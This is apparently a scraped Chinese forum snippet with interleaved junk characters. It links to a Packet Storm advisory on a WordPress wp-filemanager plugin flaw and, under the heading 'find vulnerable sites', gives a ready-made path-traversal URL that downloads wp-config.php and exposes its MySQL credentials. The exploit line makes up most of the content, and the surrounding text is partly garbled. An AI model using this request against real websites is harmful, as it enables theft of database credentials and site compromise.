洞详解:http://packetstormsecurity.com/f ... -File-Download.html
0 f, V8 {% G4 W) c* W7 o3 t " @ m# c) ^& |* W6 ^
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。0 N6 C- c/ o5 d) O$ y. g W
|